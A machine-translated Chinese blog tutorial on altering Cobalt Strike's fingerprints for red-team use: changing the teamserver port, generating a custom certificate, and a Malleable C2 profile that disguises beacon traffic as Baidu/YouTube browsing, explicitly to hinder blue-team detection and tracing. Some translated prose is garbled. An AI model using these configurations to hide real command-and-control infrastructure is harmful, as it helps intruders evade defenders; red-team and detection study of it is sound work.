Cobalt strike feature modification

Fight in red and blue and hvv Wait, in case , We all use  Cobalt Strike, Then it is also the focus of security companies , Follow msf similar , but CS Operation comparison MSF Easy to use , There is also a powerful plug-in library . that , Such a red tool , In terms of features, there must be some features in the security software feature library , So we need to modify its characteristics .

------ This article mainly explores CS Its own characteristics , Do not include Trojan horse free , In the future, I will write articles about the exemption from killing , It is also a record of learning , Welcome your guidance .

One 、CS Default port

CS The default port opened is 50050, When the blue team was analyzing , notice ip to open up 50050, Generally ban 了 , apparently CS The port of , therefore , We need to change 50050 port .

File on the server teamserver Internal modification ,

vi teamserver

Put the code at the bottom 50050 Change to another port , that will do

  Two 、CS The fingerprint https Feature certificate modification

By default, we do not configure CS On certificate , It uses CS Self contained certificate , Let's not say why we need to modify , Let's first look at the contents of the default certificate

Use keytool.exe【 If there is a computer java Environmental Science , It is brought by itself. 】 open ,

keytool -list -v -keystore cobaltstrike.store

  You need to enter a password , The default is 123456, If not 123456, You can try to open teamserver file , see

You can try it , I do not know! , The password doesn't matter , Later, we need to generate by ourselves .

This is original  cobaltstrike.store file , All is CS features , Directly to , Killing .

At this point, we need to generate the certificate ourselves .

keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias SuanSuan -dname "CN=Suan Suan, OU=Suan, O=Suan, L=LongZu, S=OO, C=OO"

  Explain what the parameters mean :

CN=( First and last names ), OU=( Organization name ), O=( Organization name ), L=( City or area name ), ST=( State or province name ), C=( The two-letter country code for the unit )
 among cobaltstrike.store For the newly generated keystore file ,-alias  Specify alias ,-storepass pass  and  -keypass pass  Specify the key ,-keyalg RSA  Specify the principal public key algorithm ,-dname  Specify the owner letter 

  According to the above information , We can generate a unique certificate by ourselves , Prevent previous certificate characteristics , Be investigated and killed .

Delete the original certificate after generating a new certificate , Put it in CS root directory , And we need to enable certificates :

keytool -importkeystore -srckeystore cobaltstrike.store -destkeystore cobaltstrike.store -deststoretype pkcs12

 cobaltstrike.store Name of the certificate generated for .

Reuse keytool Check it out. ,

keytool -list -v -keystore cobaltstrike.store

At this point, the certificate is already the certificate information we just set

At this time, the certificate is not fully effective , See below for details c2 To configure .

3、 ... and 、CS Of http Modification of service traffic characteristics

Our husband becomes a http Trojan file of service , Use wireshark Grab the bag to check the details

  This packet is CS no http Data packets of , It's strange to request and return from packets , Too few parameters , and U-A So is the head IE Browser's , It should also be rarely used IE Well , So we still need to revise .

Use Malleable C2 Profile Customize CS Traffic characteristics ,

Reference items :https://github.com/xx0hcd/Malleable-C2-Profiles

Scalable command and control (helpsystems.com)

Configure according to the template file profile,

###global options###
 
set sleeptime "37500";               # Company ms
set jitter "35";                     # Sleep jitter time , percentage 0-99
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36 Edg/97.0.1072.69";#U-A Head customization 
 
###SSl Options###
# If there is a certificate here, you can directly use the certificate generated by yourself , Remove the comments here , Comment the following code that generates the certificate , If not, use the following code to generate .
#https-certificate {
	#set keystore "cs Inside .store file location ";
	#set password ".store Certificate file key ";
#}
 
https-certificate {
	set C "US";                       # Alphabetic country code 
	set CN "Suan Suan";               # First and last names 
	set L "WU";                       # The city name 
	set O "Suan Suan";                # Organization name 
	set OU "Suan Suan";               # Organization name 
	set ST "WU";                      # Name of state or province 
	set validity "365";               # The certificate takes effect on 
}
###CODE-SIGNER BLOCK###
code-signer{
	# Used for signing  Windows Executable and Windows Executable(S), Make sure Payload Uniformity 
	set keystore "cobaltstrike.store";            # Certificate file name 
    set password "123456";                        # Password in certificate 
    set alias "baidu.com";                        # Certificate alias 
}
###HTTP-GET Block###
http-get {
    
    set uri "/video /knowledge /douga /cinephile"; #  Customize multiple url Request path , Separated by spaces 
	# Configure request parameters 
    client {
		header "referer" "https://www.baidu.com/";
        header "Host" "https://youtube.com/";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
        header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6";
        header "Connection" "close";
        metadata {
    
            netbiosu;                                         # netbios( Capitalization ) code 
            append "BV1kF411J7zG?spm_id_from=333.5.0.0";      #  Append the parameter content with the suffix 
            parameter "file";                                 #  Put the content in the new url Parameters in 
            prepend "v=";   							      #  Append the prefix of parameter content 
            header "Cookie";   							      #  Add to HTTP Cookie In the head 
        }
    }
	# Response content 
    server {
     
        header "Content-Type" "text/html; charset=utf-8";
		header "content-encoding" "gzip";
		header "set-cookie" "innersign=1; path=/; domain=.youtube.com/";
        output {
            base64;
            print;            
        }
    }
}
###HTTP-Post Block###
http-post {
    
    set uri "/knowledge= /food=";   #  Cannot be associated with http-get Of url The request path is exactly the same 
 
    client {
    
	    header "Host" "https://youtube.com/";
        header "Accept" "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9";
        header "Accept-Language" "zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6";
	    header "Connection" "close";     
        id {
            netbios;
            append "spm_id_from=333.5.0.0";
            uri-append;         #  Append to url At the end of 
        }
        
        output {
    
            base64;   
	        print;
        }
    }
        
    server {
     
        output {
    
            base64;
            print;
        }
    }
}

  The above configuration file 【 Write according to the above instructions , There are many unreasonable places in the above document 】 Yes http And https Configuration of ,https Yes, enable the above certificate , Custom certificate characteristics ,http Is to make the transmitted packets more authentic , Increase the difficulty of tracing the source of the blue team .

Use the following command to enable profile The configuration file

./teamserver 192.168.1.109 suan c2.profile

Is in the CS Under normal startup, it will profile After the file is loaded .

Now let's take a look at the Trojan horse file http Service packets

This changed packet , We modify it ourselves according to the actual situation profile file , Make the data package more authentic .

Then there are https Well , Let's take a look https service

At this time, our certificate will come out , If in  profile There is no configuration in the file https Words , Certificate information will not be displayed , All kinds of information are empty .

Four 、 Domain preposition

This technology is relatively good , I.e. configuration cdn service , Prevent traceability to ip, And I won't find it really ip, As a minor , Unable to record the domain name , So I'll add it later .

Statement ： The technology involved in this paper 、 Ideas and tools are only used for learning and communication for safety purposes , No one can use it for illegal purposes , Otherwise, the consequences shall be borne by yourself ！！！